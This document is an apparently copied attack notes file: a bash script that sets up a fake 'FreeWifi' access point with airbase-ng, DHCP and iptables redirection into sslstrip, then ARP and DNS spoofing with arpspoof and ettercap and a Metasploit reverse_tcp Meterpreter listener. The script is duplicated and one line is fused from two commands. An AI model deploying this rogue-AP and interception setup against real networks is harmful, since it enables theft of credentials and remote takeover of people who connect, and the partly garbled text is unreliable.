SCRIPT:
#!/bin/bash
if [ "$1" == "stop" ];then
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 3;
echo "Killing DHCP..."
pkill dhcpd
sleep 3;
echo "Flushing iptables"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "killing sslstrip the hard way"
killall python
echo "killing sslstrip pid"
killall sslstrip
echo "killing DHCP server"
killall dhcpd3
echo "disabling IP Forwarding"
echo "0" > /proc/sys/net/ipv4/ip_forward
echo "removing alfa and bringing it back - vmware only"
rmmod rtl8187
rfkill block all
rfkill unblock all
modprobe rtl8187
sleep 5
rfkill unblock all
echo "bringing up wlan0"
ifconfig wlan0 up
elif [ "$1" == "start" ] ; then
echo "Putting card in monitor mode"
airmon-ng start wlan0 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e FreeWifi -c 11 wlan0mon & # Change essid, channel and interface
sleep 5;
echo "configuring interface at0 according to dhcpd3 config"
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
echo "adding a route"
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
sleep 5;
echo "configuring iptables"
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth1 to your internet facing interface
echo "setting up sslstrip interception"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -a -w /root/fakewifi/sslstrip.out &
sleep 2;
#echo "start ferret"
#ferret -i at0
#sleep 3;
#echo "start hamster"
#hamster
#sleep 3;
cd ~
echo "clearing lease table"
echo > '/var/lib/dhcp/dhcpd.leases'
echo "starting new DHCPD server"
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
sleep 5;
echo "enabling IP Forwarding...ENJOY the SHOW"
echo "1" > /proc/sys/net/ipv4/ip_forward
else
echo "usage: ./airstrip.sh stop|start"
fi
arpspoof -i at0 192.168.2.129
ettercap -T -q -i at0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.131
set LPORT 4444
exploit
#!/bin/bash
if [ "$1" == "stop" ];then
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 3;
echo "Killing DHCP..."
pkill dhcpd
sleep 3;
echo "Flushing iptables"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "killing sslstrip the hard way"
killall python
echo "killing sslstrip pid"
killall sslstrip
echo "killing DHCP server"
killall dhcpd3
echo "disabling IP Forwarding"
echo "0" > /proc/sys/net/ipv4/ip_forward
echo "removing alfa and bringing it back - vmware only"
rmmod rtl8187
rfkill block all
rfkill unblock all
modprobe rtl8187
sleep 5
rfkill unblock all
echo "bringing up wlan0"
ifconfig wlan0 up
elif [ "$1" == "start" ] ; then
echo "Putting card in monitor mode"
airmon-ng start wlan0 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e FreeWifi -c 11 wlan0mon & # Change essid, channel and interface
sleep 5;
echo "configuring interface at0 according to dhcpd3 config"
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
echo "adding a route"
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
sleep 5;
echo "configuring iptables"
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth1 to your internet facing interface
echo "setting up sslstrip interception"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -a -w /root/fakewifi/sslstrip.out &
sleep 2;
#echo "start ferret"
#ferret -i at0
#sleep 3;
#echo "start hamster"
#hamster
#sleep 3;
cd ~
echo "clearing lease table"
echo > '/var/lib/dhcp/dhcpd.leases'
echo "starting new DHCPD server"
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
sleep 5;
echo "enabling IP Forwarding...ENJOY the SHOW"
echo "1" > /proc/sys/net/ipv4/ip_forward
else
echo "usage: ./airstrip.sh stop|start"
fi
DHCP:
# cat /etc/dhcp3/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
///
nano /usr/share/ettercap/etter.dnsarpspoof -i at0 192.168.2.129
ettercap -T -q -i at0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.131
set LPORT 4444
exploit